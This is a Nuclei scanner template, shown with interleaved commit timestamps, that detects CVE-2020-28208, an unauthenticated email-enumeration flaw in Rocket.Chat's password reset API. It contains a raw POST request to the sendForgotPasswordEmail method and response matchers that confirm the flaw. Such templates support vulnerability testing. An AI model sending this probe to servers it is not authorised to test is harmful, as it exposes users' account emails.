2021-03-29 11:39:45 +00:00
|
|
|
id: CVE-2020-28208
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: RocketChat Unauthenticated Email enumeration
|
|
|
|
author: pdteam
|
|
|
|
severity: medium
|
|
|
|
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://trovent.io/security-advisory-2010-01
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt
|
|
|
|
- http://www.openwall.com/lists/oss-security/2021/01/07/1
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 5.3
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-28208
|
|
|
|
cwe-id: CWE-203
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2020,rocketchat
|
2021-03-29 11:39:45 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Origin: {{BaseURL}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '"result\":false'
|
|
|
|
- '"success":true'
|
|
|
|
part: body
|
|
|
|
condition: and
|